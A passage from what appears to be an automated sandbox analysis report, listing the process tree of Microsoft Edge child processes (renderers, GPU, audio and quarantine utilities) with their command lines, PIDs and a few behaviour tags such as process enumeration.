  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4264 /prefetch:1
  2⤵
  PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
  2⤵
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
  2⤵
  PID:1372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
  2⤵
  PID:236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
  2⤵
  PID:2716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
  2⤵
  PID:556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
  2⤵
  PID:2408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:1
  2⤵
  PID:4484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1
  2⤵
  PID:2028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:1
  2⤵
  PID:3324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
  2⤵
  PID:1592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7292 /prefetch:1
  2⤵
  PID:2108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7532 /prefetch:1
  2⤵
  PID:4992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7264 /prefetch:1
  2⤵
  PID:3328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:1
  2⤵
  PID:1900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
  2⤵
  PID:4580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3032 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7612 /prefetch:1
  2⤵
  PID:2100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7952 /prefetch:1
  2⤵
  PID:1584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8060 /prefetch:1
  2⤵
  PID:3944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:1
  2⤵
  PID:3372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=992 /prefetch:1
  2⤵
  PID:4964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
  2⤵
  PID:3272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8088 /prefetch:1
  2⤵
  PID:1324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8024 /prefetch:1
  2⤵
  PID:4984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
  2⤵
  PID:2328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5976 /prefetch:8
  2⤵
  PID:2532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6016 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:1
  2⤵
  PID:2916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7192 /prefetch:1
  2⤵
  PID:3444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:1
  2⤵
  PID:888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7276 /prefetch:1
  2⤵
  PID:908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7320 /prefetch:1
  2⤵
  PID:1224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8456 /prefetch:1
  2⤵
  PID:784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8536 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
  2⤵
  PID:976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8536 /prefetch:1
  2⤵
  PID:2844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8184 /prefetch:1
  2⤵
  PID:5016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9060 /prefetch:1
  2⤵
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8892 /prefetch:1
  2⤵
  PID:3724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8932 /prefetch:1
  2⤵
  PID:460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9100 /prefetch:1
  2⤵
  PID:1496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9264 /prefetch:1
  2⤵
  PID:3936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9252 /prefetch:1
  2⤵
  PID:1408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9728 /prefetch:1
  2⤵
  PID:4460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9316 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9364 /prefetch:1
  2⤵
  PID:3008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9572 /prefetch:1
  2⤵
  PID:5436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6964 /prefetch:1
  2⤵
  PID:5512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9192 /prefetch:1
  2⤵
  PID:6060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9500 /prefetch:1
  2⤵
  PID:1376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9956 /prefetch:1
  2⤵
  PID:1588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10156 /prefetch:1
  2⤵
  PID:3368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10196 /prefetch:1
  2⤵
  PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8968 /prefetch:1
  2⤵
  PID:5288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:1
  2⤵
  PID:5344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10364 /prefetch:1
  2⤵
  PID:2736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10784 /prefetch:1
  2⤵
  PID:724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11044 /prefetch:1
  2⤵
  PID:5828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10568 /prefetch:1
  2⤵
  PID:5600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1132 /prefetch:1
  2⤵
  PID:2476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10984 /prefetch:1
  2⤵
  PID:5984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11268 /prefetch:1
  2⤵
  PID:5700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10356 /prefetch:1
  2⤵
  PID:2176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11388 /prefetch:1
  2⤵
  PID:3164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
